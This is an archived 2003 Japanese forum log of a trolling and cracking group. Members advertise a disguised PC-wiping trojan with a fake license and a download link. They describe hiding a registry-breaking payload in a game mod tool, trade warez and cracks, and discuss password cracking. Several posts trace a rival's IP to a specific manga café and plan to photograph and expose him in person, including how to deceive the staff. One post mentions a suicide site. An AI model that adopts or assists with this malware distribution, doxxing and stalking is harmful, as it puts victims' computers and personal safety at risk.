Use of proxies is under restriction. (access & write) - 4499
暗黒黙示録 VIPメンバー用BBS
 偉大なk3大先生(プを囲む会 
 
監視用リンク集診断くん
-- Iron Maiden --deg板) | 荒らし幕府(ゆかり) 
● 暗黒黙示録 - 雑談BBS - 暗黒元帥BBS | ● 獄龍鬼神
● 影骸(紗封影)(営業時間:夕方〜夜11時前後(PCつけている間)) |  旧暗黒 BBS |  $2武器庫
 暗黒・帝国軍極秘演習用射撃試験場(24時間営業w) |  お花畑
● 悪夢 | ● 神聖荒らし帝国
暗黒幕府領 光圀自治州倒幕画像展示場
LIST   新規スレッド作成 /  Reload 
8 時間以内の記事を含むスレッドには  を表示
1 雑談スレ Part3(21)  2 ざつだんすれっど ぱーと2(200-Limit-)  3 新ウエポン、タンツボ砲(35)  4 3.24の夜に御神薙氏と初めて電話で話しました(1)  5 「Virginia Class」完成まで待てない!スレ(6)  6 暗黒・帝国軍共用極秘試験射撃場…完成!!(3) 
7 ここのログインパスワードに関して(4)  8 XG達のジャニヲタ潰し(5)  9 暗黒黙示録(12)  10 注目サイト覚え書(4)  11 Javaに関しての質問(2)  12 暗黒幕府再浮上計画(4)  13 倒幕打 データ募集(34)  14 偉大なk3大先生(プを囲む会(5)  15 >$2殿(8)  16 荒らす為にある。ここサイト(1)  17 スカルウェポンのシステム(4)  18 ツール屋(14) 

表示件数 新着表示時間 検索語
ラジオボタン選択→Reloadでそのスレッドを先頭にしたページを表示

■ 雑談スレ Part3
[1] 暗黒元帥 at 2003/06/24 Tue 07:45:12  /* Master */
お馴染み雑談用です。
[13] 暗黒元帥 at 2003/06/26 Thu 17:14:16  /* Master */
>紗封影氏

Stormが警察沙汰にしたのは全くもって愚かな行為です。
界隈全域が監視下に置かれたようなモノですからね。
特にクラック系(パスクラ含む)ワレモノ系の犯行声明等は要注意なので自粛した方が良いかも。

> もうちょっと警察が事を知っていればStorm逮捕も出来たんでしょうね。
荒らしで逮捕するには、被害者が自殺とか企業のサイトで営業妨害になった等の
被害届が出ないと無理なようです。(パスクラは逮捕)
実際ハイテク課の人はStormに荒らしツール配布の停止を勧めているそうですが
強制的には停止出来ないようなので。(この辺の情報は極秘にお願いしますね。)

> 1)鉄にデスクトップのキャプチャ画像をUP。
> ↑もし、上級が変に訴えれば鉄のログなど取るのは出来るのでは?
訴えればログは取られますが、マンガ喫茶のデスクトップ画像をUPする事自体は
何も問題在りません。それをネタに“明らかな脅迫”をするとマズイかも知れません。

> 暗黒系統が鉄の管理ログを書きかえれるなら話は別
それは出来ません。

> この際、暗黒系統が管理できるUp板を利用してUPした方が…
警察沙汰になればこちらのログも提出しなければならないです。
(証拠を隠すと罪が重くなります。)

> 下手にUP物間違うとこちらが負ける可能性もあるので慎重に事を進めた方が良いと思います。
そうですね。慎重に進めましょう。
[14] G殺し@$2 at 2003/06/27 Fri 18:21:48  /* ID:uczNmW12 */
ゲラゲラ綱島店の写真…上級だけでなくG・k3やクポまでも氏に追いやることが出来る
まさしくアルテマウェポン(最終兵器)です。
k3にとっては同じ横浜在住の人間なので、それは十倍も二十倍も恐怖という
形となって表れるでしょう。
またクポの奴にとっては復活の機会を、最低でも今後2年間は失うことになり、
糞将軍の復活をさらに遅らせることが出来るでしょう。
Stormにとっては自ら刑事事件(プにしてしまった報復への見せしめではないかということで
奴にもかなりのダメージを与えることができるでしょう。
そして、暗黒の持つスカルウェポン、ならびに極秘情報の数々!
これらをうまく駆使すれば、確実にk3やクポ、Gやタンツヴォという敵を叩き潰せます。
特にk3は、どんなに叩かれ煽られ槍玉に挙げられても決して潰れない、
まさにゴキブリそのもの、いやそれ以上のしぶとさ(プを持ち合わせております。
クポが氏んでも、奴だけは倒れなかった(プ
しかしこれらを発動すれば「次は恐らく自分の番」という最高の恐怖感(ゲラを与えられるでしょう。
八方美人の顔に泥ならぬビチグソを塗れるのも夢ではないと確信しています(ワラ

一方で、使い方を誤ればそれは核爆弾のスイッチとなり得ます。
界自体を木っ端微塵に吹き飛ばしてしまうでしょう。暗黒や鉄自体はもちろんのこと、
私$2ももちろん、元帥殿、影殿、鬼神氏、XG氏、Storm、クポ、
御神薙氏、タンツボ、たかタソ、奇襲、さらにはGやk3にまで確実にポリの手か廻ります(汗
そしてログを調べられ、総統、ヨノイ、青山、ピキッ!やウーヴァタにも何らかの手が回るでしょう。
まさしく、界隈を核の冬に陥れる危険きわまる殺人兵器です。
ですが、適切に運用すれば最高の武器になります。
以上のことを踏まえ、プロジェクトは極秘に進める必要があります。
[15] 紗封 at 2003/06/27 Fri 20:04:42
警察も意外と動けないんですね…
パスクラは逮捕か(汗)うかつに抜けませんな…

>実際ハイテク課の人はStormに荒らしツール配布の停止を勧めているそうですが
強制的には停止出来ないようなので。

極秘の件は了解しました。
Stormはソースのみ配布になるらしいですがコンパイルは出来るので
その時はStormのコンパイルは余裕でします(笑)
まぁJAVAのコンパイルくらい調べれば簡単に出来ますが^^;

>暗黒の持つスカルウェポン、ならびに極秘情報の数々!
そうですね…ただSCULLは実行ファイルなので
今出すと…私が豚箱でブゥブゥ言わなきゃ駄目になります。(カンベンですよ)
やるとすればターゲットのみダウンロードできるファイルシステムなどがいるかも…
極秘情報は多い分、漏れた時が怖いです。

Stormが警察に突き出した時点で段々と界が不安定になってきてるので
プロジェクトや表発言にも少し注意を払います・・・
[16] G殺し@$2 at 2003/07/04 Fri 14:29:31  /* ID:uczNmW12 */
Deg板でタンツボ厨房に代わり、Gと双璧を成すもう一人の電波王・おなまえさんが台頭してきましたね。

>抗議いたします
> Name:川崎二郎  Date: 07/04 Fri 01:04:41 [ID:GPNJHHp021M]

>川崎二郎さんへ
>あなたは私の騙りですね。
>ハッキングをされている方へ
>あなたは普段隔離しているパソコンから知人の一覧表という重要な機密を盗み出しましたね。
>そしてこれ見よがしに書き出していますね。悪質です。
>また、あなたには家のなかを覗いているという疑いがあります。
>そんな折、再三、抗議、警告を受けているにもかかわらず、
>無視してハッキングを繰り返しているのは、明らかに犯罪行為であると考えられますよ。やめてください。

この機会に、タンツヴォにはFATEネタの嵐の中に埋もれていただきましょう(プ 一応、
>Name:上級厨房  Date: 07/01 Tue 22:02:28 [ID:TtBDOddrj2o]
に対し
>Name:$2  Date: 07/02 Wed 20:55:29 [ID:FQbCHpslVdE]
でけん制パンチを食らわせ、
>Name:プ  Date: 07/03 Thu 22:45:30
でさらにジャブで始末しておきましたが、今鉄板の住民はFATEに気を取られており、
またUZEEタンツボがブゥスカ鳴く状況は望んでいないはずでしょう。
すでにゲラゲラ厨房もエネルギー切れ寸前であり、これを機に完全に廃れさせてしまいましょう(ゲラプ
またタンツボが出てくれば、「FATE君ネタで盛り上がってるのに横槍入れるなカス」と
ボコっておくのも手です。
なお、写真のほうはタンツボの失脚の成否に関わらず、画像板で極秘うpする予定です。
[17] G殺し@$2 at 2003/07/07 Mon 22:57:16  /* ID:uczNmW12 */
ものすごいFTPサイトを見付けました(ワラ
ftp://tebukuro.ath.cx/ (パスワードは必要ありません)

まさしくオメガ!!こここそZ!!!ここにいけば大抵のものは
揃うようです。
ついに俺は、究極のアプろだを見付けてしまったのか…(;´Д`)

FTPで思い出したのですが、FTP串って何のことでしょうか?
普通のHTTP串と違い、漏れがない(漏れという定義自体がない)と
2chで見かけましたが…。

(message was edited at 2003/07/07 Mon 23:09:57)
[18] 紗封 at 2003/07/08 Tue 19:42:44
うぅむ、あまりアプリが無い…
まぁフリクリでも貰っておきます…
サンクス。
[19] 紗封 at 2003/07/11 Fri 21:29:53
↑のFTPでPSO改造ツール出したのは私です。
一応、ちょっとしたレジストリブレイクも仕込ませてます。
Win98使ってる人用なので大丈夫とは思うけど…。
気をつけてください。

最近VB真面目に勉強してます。
結構面白いですね。
VB覚えたらCGI挑戦しようかと…
その時は元帥さんのお勧めの勉強法などあれば教えてくださいな。
VBはカラー本を2冊、それと学校の教科書、ノート、プリントと実際のVB弄って
やってます。これで覚えれなきゃ…泣く…まぁだいぶ慣れてきましたけど…
[20] G殺し@$2 at 2003/07/22 Tue 14:12:48  /* ID:uczNmW12 */
>元帥・影殿

元帥板のほうにも書きましたが、今後しばらくの間は
ロクにここに来れそうにありません(汗 いやぁ、参りました…。
今後NETの使用目的はIDEMやリクルート(プなどに限られてしまいそうです(ワラ

ですが、ここのPASS垢は何としても消さないで下さるようお願いします(o_ _)o))
ここに繋げられなくなったら、もう俺は界には戻れない…(;´Д`)
それと、復帰後のプロバイダは、もしかしたら今のFreecomではないかもしれませんので
事前にお言付けしておきます。
復帰後は・A href="mailto:Agensui@104.net">Agensui@104.net(でよかったかな?)充てに復帰の旨のお知らせと、
確認くんなどのファイルをメールに添付…という形で宜しいでしょうか?
[21] G殺し@$2 at 2003/07/22 Tue 14:15:52  /* ID:uczNmW12 */
あれ…?なんで「gensui」のアタマに“A”が…???

名前    Link   

削除パス (8文字以内の半角英数字)/ Mode
●記事選択→削除パス入力→Mode選択→実行で記事の訂正や削除が可能。


■ ざつだんすれっど ぱーと2
[1] 影骸法師 at 2002/11/03 Sun 09:32:13  /* ID:2WeeUHDD */
ひらがななのは何故だろう(藁
まぁ、前回同様 雑談しましょうw
[192] 暗黒元帥 at 2003/06/18 Wed 13:08:54  /* Master */
>紗封影さん

UA偽装の拒否機能と言うのは見たことない機能ですよね。
更に強化版に仕上げて行きたいと思います。

> それより小粒サイズとか機能追加しすぎで負荷大丈夫でしょうか?
負荷は大した事はないです。
あれと偽装拒否の併せ技で、ゲラゲラ厨房もすっかり意気消沈したようですな(藁

> 朝日さんとC言語にてDLLを作った為に膨大な命令を追加しました。
有益?な機能ばかりですね(汁
私はPerlばかり弄っているので他の言語になかなか時間を避けないようです(苦笑

> 上 級 P C 潰 し た い …マジで。
>  ネ ト カ フ ェ だ ろ う か ら 怒 ら れ る の ヤ シ だ し 。
店が怒ると警察沙汰になりかねないので、そうなると我々が罪に問われます。
実は最近私はStormのパスクラ被害届のせいで事情聴取されました。(これは超極秘で)

>$2殿

ゲラゲラ厨は粘着野郎ですよねー。
我々に対してもそうですが、DDDと言う素人集団にまで半年以上も粘着してると言う(ワラ
ああ言うタイプは誰も相手にしなくなれば自然死するんですけどね(w
最近k3も相手にしなくなって来たようなのでもう少しかな。

> 今のところわかっている情報は、どうも彼は20:00〜22:00の時間帯に
> 投稿する傾向が強いようですねw
活動時間帯の資料が揃っていれば、後にゲラゲラ店長宛てに抗議する際等に
大変都合が良いです。
私も少し前まではk3チャットへの入退室時間等をチェックしておりました。
リアル制裁は遣ろうと思えばいつでも出来るんですよね(藁

海援隊BBSは鬼神氏が用意した物でして、私も何度か直接電話で閉鎖を進言したのですが、
CRVKではなく たかタソが可愛いので、そのためにもう少し残しておきたいとの事です。
(たかタソは今やあそこにほとんど絡んでないようには見えますけど・・・)
[193] G殺し@$2 at 2003/06/19 Thu 13:02:24  /* ID:uczNmW12 */
ぐおおおおおおおおお、暑ちぃぃぃぃぃ…
何とかならんのかいこの暑さ!!!(糞

>元帥・影殿
対G・タンツボ用にこんな画像を作ってみました(ゲラ 画像板にうpっておきますた。
http://ime.nu/snow.prohosting.com/carrozza/cgi-bin/up/img/55.jpg (check)
“タンツ房は”は“タンツ房を”に変えたほうが良かったかなとも思っておりますが、
全体的に言えば上出来かなとまあまあ自信を持っております(ップ

しつこいGと糞厨房にいい加減嫌気が差していましてねぇ(ムップス
丁度良い“G”仮面の巻物看板絵があったので、元の文字を消して
グラフィック関連で少し細工をした後、テキストをそのまま摩り替えてやりました(ゲラップス
これくらいのことなら1時間もあれば完了できますわな(ップス
[194] 暗黒元帥 at 2003/06/20 Fri 15:28:29  /* Master */
暑いですよねー、死ぬ程。
今日は秋葉原でA3ノビ用のEPSON製プリンタを買って来たのですが、
11kgちょっとあるものを歩き&電車で持ち帰ったので
汗ダクになりました。

>$2殿

「おホモ様ダッコの刑」画像、笑いました(w
てか、かなり良く出来てますね。

「お前らのデスクトップ画像をうp汁!!」スレの[5]の正体は
実は間宮(初代G)なのですが、嗜好がなかなかキテます(笑
(正体は内密に。一応。)
すっかり潜っていた$2殿のスレを上げている辺り、彼はだんだん
こちらに心を開いて来た(プように感じますが、どうでしょう?
心理分析的には。
元帥BBSにも幾つかのハンドルで普通に書き込んでますし。
[195] G殺し@$2 at 2003/06/23 Mon 09:47:43  /* ID:uczNmW12 */
>閣下
喜んでいただき光栄です(ワラ そして…!!

あす、または木曜、界への予告なしでゲラゲラ厨房が巣くう
「まんが@カフェ 綱島店」に突撃を掛けます。
病院帰り(日中)での進撃ですので、
時間帯が違いタンツボに出会える確立は低いですが、今度はインスタントカメラ持参なので
奴にとっては最後通告を突き付けられた形になりますな(プ
ぐへへへ…(ププス
[196] 暗黒元帥 at 2003/06/23 Mon 13:03:39  /* Master */
>$2殿

おおっ、突撃楽しみです。
雑談BBSと元帥BBSを、「$2」のHNでPASSが一致したら投稿出来るように
しておきましょうか?(現在は綱島店からだと不可なので)

撮影の狙い目(候補)としてはやはり店員ですかね。
奴はある時期からProxomitoronと言う環境変数偽装ツールを使っているのですが
それを店内の全PCにインストールしているとは思い難く、
同一のPCを利用している可能性があるからです。
(客としてでもPCを選別し易いのならまた別ですが)
[197] G殺し@$2 at 2003/06/23 Mon 13:43:58  /* ID:uczNmW12 */
>閣下

>「$2」のHNでPASSが一致したら投稿出来るように
是非おながいします(ゲラ

奇襲君のほうも最近やたら騒々しくなったので少し押し沖を入れてやりました(プ

[3] 胡タ at 2003/06/23 Mon 08:20:06
■ ▲ ▼
一足先に公開開始!!
http://ime.nu/fearless.nikeya.com/download/ (check) (check)
[4] $2 at 2003/06/23 Mon 11:21:32  /* 白夜の戦士 */
■ ▲ ▼
いい加減マルチポストUZeeee
お得意の糞ネタ晒すならどこか1箇所にでもスレ纏めるなりしろや(プ
[5] 刃霧亜希 at 2003/06/23 Mon 12:24:16  /* ID:tO4iw1kA */
■ ▲ ▼
>胡タさん
色々とお疲れ様です。
[6] $2 at 2003/06/23 Mon 13:29:05  /* 白夜の戦士 */
■ ▲ ▼
俺がレスするとすかさず“臭いものにふたをする”自作自演フォローの奇襲君(w
こっちは全部分かってるぞ(ゲラップ
ゲラゲラ房と似たようなもんだな(ワライ


あまりあからさまに撮りまくっていると逆に怪しまれたりしませんかね?
そこんとこがちょっと心配なんですが…(;´Д`)
店員にどう言い訳すれば良いか…。
[198] 紗封影 at 2003/06/23 Mon 16:04:09  /* ID:N0D9lBLq */
久々に来ました。
とりあえず、かなり破壊型の改造をしました。
まず、BOOT.iniの書き換え。意味無いけど一応。
レジストリ全削除。スタートメニュー押せない。ゴミ箱が消える。
ペーストしたフォルダに大量のくずデータを同時にペーストさせる。
ふふ…そろそろ2M目行きます…
ソースが普通にHSPで入れれなくなったので外部コンパイラしてます(汗

元帥さん>店破壊が無理なら上級はリアルで追い詰めれる$2さんに任せます。
どうせPCも持ってないんだろうな。毎日ネトカフェ行ってるくらいだから(藁
しかしStorm氏のパスクラとは一体!?

$2さん>下手に相手が店員なら店内写真禁止にされそうだし…
それに下手すると上級店員が無理やり「写真禁止なのでフィルム没収しますね』
とか言って禁止でもないのに没収されてしまいそう。

「ちょっとした日記サイト経営してまして…ネトカフェの記事書くのに画像として使う」
とか言ったらどうでしょう?日記系サイトしてる人もこういう風に言って画像使ってるそうです(ばれたら)
(雑誌とか言うと変に雑誌名・出版社など聞かれますからね…
この場合はURL・メールアドレスは適当で本物っぽいのを教えれば騙せるし)
とる場合はオドオドせずきっちりバシと採った方がいいらしいです(だが上級をみてバシっと取れるのだろうか?)
一応、武器の用意を忘れず(まぁ強ければ上級に見つかってもいじめちまえば…)
上手く上級とれれば極秘で写真をうpってくださいまし。

ちょっと、Tripodに削除されたので現在サイト真っ白してます…
後、デスクトップ画像、今度うpしてみます。(名前変えてうpしておくつもり)
それと良く、水戸殿とメッセで話しているので彼と会話するなどなら
こちらから伝えますです。
[199] 紗封影 at 2003/06/23 Mon 16:08:46  /* ID:N0D9lBLq */
一応、店内PCで$2として書き込まれる場合、その日用のPASSにした方が良いかも。
(キーのログなど、見ようと思えば普通に見れる時代ですし)

オートコンプリートもIEではあるのでそういう点でゲラゲラに行かれる時だけ
PASSは別のもので書き込まれる必要があります。
(まぁ解ってるかと思いますが念のため)

しかし、パス一致で書き込み可能とかも出来るとは…
[200] 暗黒元帥 at 2003/06/24 Tue 07:42:33  /* Master */
umeます。

削除パス Mode
●レスが設定件数に達しています。このスレッドへの返信はできません。
●記事選択→削除パス入力→Mode選択→実行で記事の訂正や削除ができます。


■ 新ウエポン、タンツボ砲
[1] 影骸 at 2003/03/07 Fri 15:33:34
タンツボ砲はインストールした相手のPCを木っ端微塵に吹き飛ばすソフトです。
インストール終了後、自動で開始されます。
インストールには『Tantubo』とパスがいります。

下は偽の使用承諾

タンツボ上級厨房砲 使用承諾書

□ タンツボ砲は荒らした人をタンツボ上級厨房のせいにする為のDUKEです。
  USER−AGENTなどを全てタンツボ上級厨房の設定にされ、アタックします。
  もちろん、内部構成はSTORMを元にしているため自動アタックです。
  ガブリDUKEのような設定は一切いりません。

□ 使用に関して
 ○ 何があっても自己責任。

□ 使い方
 ○ 設定読込はしばし待て。
 ○ プロキシはhttp://ime.nu/www.cybersyndrome.net/ (check) から自動取得。
   診断君により自動診断。串の振り分けまで自動です。
 ○ TARGETにアタック先URL。
 ○ 回数にアタック回数。
 ○ 休時間はWAIT。0は入れるな。1以上にする。
 ○ 兵士人数はアタックする兵士ウェアの起動数。
   CPU500M、メモリ256Mなら3が限度。
   CPU1G、メモリ256Mなら5が限度。
 ○ プロキシリストは自動で取得される。
   ?串チェックで振り分けられた串のLVを指定。
 ○ 最後にメッセージを書いてGOを押すだけ。

□ 著作権
     タンツボ上級厨房ソフトウェア委員会

(ここまでが偽承諾)
もちろんDUKEではありません。
MSNで実験した所、無事にウイルスではないといわれ、オンラインスキャンでも無事に通過。
むかつく人にぶち込んであげてください。
使用承諾や実行画面などを変えて欲しい場合はレス下さい。

ダウンロード先
http://ime.nu/members.tripod.co.jp/meyle/Tantubo.exe (check)

くれぐれも悪用の無いようお願いします。
[27] G殺し@$2 at 2003/03/25 Tue 13:37:24  /* ID:uczNmW12 */
タンツボ上級厨房にリアルで追い込みを掛けてやりました(ゲラップ

さすがのしぶとい上級も、まさかリアルで裏をパクられるなどとは
考えもしなかったでしょう(ップップ
この戦い、私の勝利と見てよろしいのでしょうか?
一旦は祭りになったのに、鉄ではこの話題に触れようとはしませんねぇ(ゲラ
何か意図的に避けているといった感じです(ムップ
そりゃそうだ(プ クポ幕府以後、実際に現実で証拠をつかまれた
初のケースなんですから(ギャハ
私がとった行動は、ある意味コムコムを超える行動と言えなくもないと思いますが、
いかがでしょうか?

この騒動により、暗黒自体をはじめ私$2、元帥閣下ほか同士の皆さんの
界での評価も大きく上昇したと思います。
鉄のクソ共など所詮喋っているだけの連中に過ぎません。
この界隈におけるもっとも危険な存在はもはや暗黒でしょう(ワラ
九歩幕府は潰す、タソツボDUKEは撃ちまくる、あじ氏や神薙氏も取り込む、
ヤヴァイツールは製作しまくる、テポドンAAは投下する、
リアルで追い討ちは掛ける…。
何、鉄の連中など敵ではありません(ゲラ しかし、総統という人物の存在が
気になりますね…。
[28] 暗黒元帥 at 2003/03/26 Wed 03:50:40  /* Master */
>影氏

> 日本語版完全対応Nortonアンチウイルス2002〜2003の日付拡張パッチ(自己改造型)
> いるならお申し込みください。
Norton Anti Virusは製品版を使っており一度は正規更新(延長)手続きを
しました。なので今後日付拡張パッチを使った場合に、もし何かの理由で
バレて逆に正規ユーザの権利まで失ってしまうのではないかと
少し心配しております(汁
その辺どうなんでしょうね。リスクは在るかと思うのですが。

> Internetsecurity2003など置く予定です。
ああ、こちらも正規購入したものを使っております。
こんなことなら買うんじゃなかった(笑

>$2殿

大変お疲れ様でした<ゲラゲラ各店の検証
> この戦い、私の勝利と見てよろしいのでしょうか?
完勝ですね。
「どうせリアルには影響ないだろう」とタカをくくっていた上級厨房も
マジでビビったに違いありません(藁
店を変えてでも登場しない(出来ない)所を見ると、やはり従業員か?(ワラ
その辺(従業員・バイト)に怪しい人はいなかったですか?

アクセスログを見ると綱島店からの最終アクセスは2003.3.24 16時4分20秒になっていますが
これは$2殿でしょうか?
そうだとすれば、上級厨房の綱島店からの最終アクセスは2003.3.20 21時21分23秒と
言う事になり、“襲撃予告”の段階で既に逃げを打っていた事になります(w
(この事は現時点では内密に。)

> この騒動により、暗黒自体をはじめ私$2、元帥閣下ほか同士の皆さんの
> 界での評価も大きく上昇したと思います。
私もそう思います。有難う御座います。
生ホストを抜いて晒したブリン氏、Avogadro氏(正体は私ですが(ゲラ)、
また兼ねてから上級厨房ゲラゲラアクセス説を説いていた御神薙氏の言動も
事実と証明されたので、相乗効果は計り知れないです。

> 総統という人物の存在が気になりますね…。
リアルヤクザ&弁護士だけはなるべく敵にしない方が良いですね(藁
[29] 影骸 at 2003/03/26 Wed 10:03:01  /* ID:8idOMDew */
正規ユーザーですか(汁
あれって高いのに…

あ、ATOK16とCloneCD4上げときました。
自鯖は安全な為にも営業時間きまってまして^^;

営業時間:夕方〜夜11時前後(PCつけている間)
サイト名:紗封影(これもデタラメにつけたり)
http://ime.nu/scull.dip.jp:6700/ (check)
↑自鯖サイト。DDNSドメイン。ポート6700もデタラメ)

生IPなのでアタックしたら完璧に落ちます。というか…PC一台で
やってるのでアタックされたら…死にます…
くれぐれも表で教えないで下さいね。
MXクラックパッチ、今日にでも上げておきます。

営業時間厳しいですがいつか24時間営業するつもりです。
(↓見れば出来ない理由がよく解ります)

$2さん>リアルで私を苛めないでね…
マジ頼みます。されたら自殺軍集合させて一緒に終了状態になります(何か謎)
(自殺サイト見つけてしまった…集団で何時でも逝ける…かも・・・)

まぁ理由ですが、うちの兄貴がかなりヤバイ逝かれなのです・・・
えぇ、ナイフだの包丁だの投げてこられたこともあるんです。(仲も悪い)
私はそんなの嫌でして祖父母の家で過ごしてるわけでして・・・
24時間PCつけるとそりゃ昭和の時代の戦争時代の鉄拳が・・・
なのでつけれない訳です(たまに居ない時だけつけてますが)

昭和時代の鉄拳はカナリ怖いですよ(汁
[30] 影骸 at 2003/03/26 Wed 18:37:56
元帥さん>
出来れば上のリンク集の不正地帯消して↑のアドレスで紗封影と変えて置いてください。
営業時間も書いてくれればなおいいんですが。
むしろ、ジャンプページだけで【営業中】とかでジャンプするページ作ろうか迷ってます。
(レンタル鯖だとジャンプ先調べられるし割れがばれるので厄介)

なお、勝手ですが、よければジャンプページだけ貸してもらえませんか?
(HSPとJAVAを使いジャンプ先が404だと【閉店中】に変わるなどの処理を考えてます。
CGIで可能なら代理設置していただいたら嬉しいのですが。
24時間サーバ出来ず、ジャンプページを本当に検討中…
そういうジャンプサービスって無料で無いかな…
[31] 暗黒元帥 at 2003/03/26 Wed 19:29:10  /* Master */
>影氏

ATOK16をいただきますね。
↑はMicrosoft IME(現在愛用中)と併用出来るんでしたっけ?
それと今まで作り上げた辞書はATOK16に流用できるのですか?
(厨な質問でスマソ)

ゾンビメールキージェネ、CloneCD4をいただきました。
上部リンクは「紗封影」に変更しました。

ジャンプページの【閉店中】表示の件ですが、
私の垢から影さんの「404」を確認して「閉店中」をブラウザに表示するとなると
CGIにsocket機能を持たせなくてはならず、負荷もそれなりにかかってしまいます。
無事に繋がる場合でもまずその前にsocketで調べる仕様になるので。
要するに可能ですが、“常用”するには重たいので余り効率が良くないかと。

影さんの方でジャンププログラムを用意されるのであれば
試しに設置してみて様子を見るのは全然問題ないですよ。
軽快であればそのまま使ってもOkです。
[32] G殺し@$2 at 2003/03/26 Wed 20:13:50  /* ID:uczNmW12 */
>元帥殿
Degでの Name:$2  Date: 03/26 Wed 19:47:00 [ID:FQbCHpslVdE]
のとおり、大学帰りの椰子が大勢いたせいか、奴を特定することは
ほぼ不可能な状況でした。申し訳ありません。
とにかく老若男女満遍なく交じり合っており、店内もどちらかといえば
暗かったので余計拍車を掛けていました。
上級と同じくしてGにも絶大な脅しを掛けることができたようです(ゲラプ
鉄より:
--------------------------------------------------------------------------------
kent:???? > 上級厨房はリアルではかなりのチキンらしいからな(プ ( 03/26 Wed 18:04:17)
--------------------------------------------------------------------------------
a.s:???? > 間宮も見ないな(プ ( 03/26 Wed 09:05:14)
--------------------------------------------------------------------------------
cry.com:???? > 最近上級厨房さんを見ませんが、何かあったんですか?(プ ( 03/26 Wed 08:54:24)


>アクセスログを見ると綱島店からの最終アクセスは2003.3.24 16時4分20秒になっていますが
>これは$2殿でしょうか?
これは高い確率で私だと思います。16:20分以後の日時のアクセスについては
私ではございません。

>影殿
素晴らしい!!後日私も利用させていただきます(ゲラ
あと、まだ氏ぬのは早いですぜ。
こんな病人の私でもしぶとく生きているのです。
親からは、働かないという理由、それだけで糞な扱いを受けていますが(プ
私は暗黒の皆さんを本当に尊敬しています。
プロのハッカーがいる…私にとって暗黒は最上の学び舎です。
私はアスキーアート以外何の能もないクソですが(ゲラ

(message was edited at 2003/03/26 Wed 20:22:30)
[33] G殺し@$2 at 2003/03/27 Thu 11:10:30  /* ID:uczNmW12 */
ただいま、影サーバーに繋げております…。
回線細すぎ(糞
やっぱり、ISDNはいけませんなぁ…(;´Д`)
あと、GRFExtractを落とそうかと思ったのですが、ファイルの情報取得中に
処理がタイムアウトになりIEが認識できません。
このファイルのサイズはどのくらいあるのでしょうか?

(message was edited at 2003/03/27 Thu 11:17:47)
[34] 影骸 at 2003/03/27 Thu 12:03:15
>$2さん
とりあえず、サイズ数を書くようにしておきます。
営業時間のほう問題ないようでよかった…
WAREZの製品とラグナロックCLIENT、GATデータ以外は1M~2Mくらいだと。
GRFExtractから吸い出すとGATファイルはいらなかったり。

>元帥さん
多分JAVAアプリになるので重いのは解っていると思います。
GETTEXTという処理を行い、<TITLE>から</TITLE>内が404という文字がある場合、
入室ボタンが押せない。
紗封影の場合、入室ボタンを出現>ボタンを押すとジャンプ。
という風にしたら楽だと思ったのですが、他人サーバからサーバへはJAVAアプリ起動に負担がかかるようです。
もう暫くJAVAとHSPを改良して作ってみます(前に一度JAVAで他人のURLに無理やり飛ばすものつけたんだけど)
[35] 影骸 at 2003/03/27 Thu 12:12:15
質問答えるの忘れてた・・・_| ̄|○

>元帥さん
ATOK16は朝日さんが取ってきたものなので良くわからないです。
多分辞書などは可能と思います。併用は…できますね(切り替えれば)

>$2さん
多分こっちのPCに問題だと(汗
回線ADSL8Mなので速度あまり出ません。
まぁ、MX並のDL速度と思ってくれれば…

Flashメニューも高度にしたりと忙しいです。
(Flash内にAccessを読み込むCGIを付けましたが動作せず…チッ)

Flashでスクロールバーやリストの読み込みってどうやるのか…
DLページなどもFlash化したい…

名前    Link   

削除パス (8文字以内の半角英数字)/ Mode
●記事選択→削除パス入力→Mode選択→実行で記事の訂正や削除が可能。


■ 3.24の夜に御神薙氏と初めて電話で話しました
[1] 暗黒元帥 at 2003/03/26 Wed 04:05:37  /* Master */
物静かで真面目そうな印象を受けました(w
以前暗黒雑談BBSに投稿された後述の記述は全て
事実(少なくとも御神薙氏はそう信じている)である事が確定しました。
きちんとした信念を持って行動している人と判断して良いと思います。
後は“疑われる”のを極端に嫌がる人といった感じですね。
ハクる技術はかなり高度だと思われます。
(このスレに関しては特に他言無用でお願いします。他スレもそうだけど。)

-------------------------------------------------
[176] 御神薙 at 2003/01/21 Tue 11:19:16  /* proved ID */

鉄のアプロダに懐かしい物がアップされて居りますね。
MotherFucker氏が界隈の列伝を作るとの事。
今更ながら私に関係する事、裏事情等、幾つか説明致します。

上級厨房氏の鉄処女でのIP晒し事件「上級厨房の生は→1.172.221.202.xf.2iij.net」の件。
このIPが事実であると仮定すると昨年の囲む会のコムコム氏のIPと一致。
つまり上級厨房氏=コムコム氏。
上級厨房氏がコムコム氏は驚いております(藁
囲む会の真相から話しておきますと、北条com.com氏(コムコム氏)はコムコム氏から
途中入れ替わり、私がコムコム氏となったわけです。
これには目的上必要な事であり、当時の私の共闘者で有名な魅氏にも同様。
魅氏、コムコム氏以外にも共闘者と共同で行動しておりました。
私が魅氏を脅迫していたという噂は魅氏の了承の上で共闘、荒らしの魅氏を受け継いだのであり、否定致します。
コムコム氏、他も同様。
無料メールクラックしていただけですので(藁

囲む会でコムコム氏に入れ替わる時に彼のIPが問題でして、マンガ喫茶ゲラゲラの物と突き止めていながらも
どこのゲラゲラまでか突き止めることができなかった点。
これは2iijを暴露した事、コムコム氏がいつも利用していた串を暴露した事、
都内の某マンガ喫茶ゲラゲラから書き込んだ事で解決。
私はコムコム氏が都内のゲラゲラと踏んで居りましたが、情報等によるとどうやら神奈川県のゲラゲラのようですな。

神奈川県のマンガ喫茶ゲラゲラでiij利用の店は綱島店、鶴見店、日吉店、横須賀店の4店のみ。
昨年のコムコム氏のIP=上級厨房のIP。
上級厨房氏はマンガ喫茶ゲラゲラに通い続けていると。
界隈の住人のネットカフェ利用。
荒らし目的の利用と自宅から書き込むことができない臆病者の2点が仮説で成り立ち、
上級厨房氏は後者の臆病者でしょう。
改竄やツール利用荒らしでネットカフェ利用は当然と考えるのはともかく、
界隈の掲示板に書き込むだけでネットカフェを利用し、鉄処女や某所でIPを抜かれている
彼は後者と考えるのが妥当(藁

次にk3氏。
私が引退時に彼に後を託そうと考えたのは本心でしたが、k3氏のその後の行動に
深い不快感を持ち、先日のソーシャルに至った背景。
k3氏は口の軽い人間でして、極秘情報でも簡単に売り渡すのでね。
ユニバーサルゲイトの亡霊や海外に行ったaaa.com氏と連絡を取り合っているのでしょう。
k3氏こそ表面上で繕う偽善者と呼びたい所ですな(藁
ユニバーサルゲイトの亡霊はいまだに改竄事件を根に持っている模様。
先日のStorm氏のパス騒動、SEY氏が今でもug.toを裏で操っている事を見ても明らか。
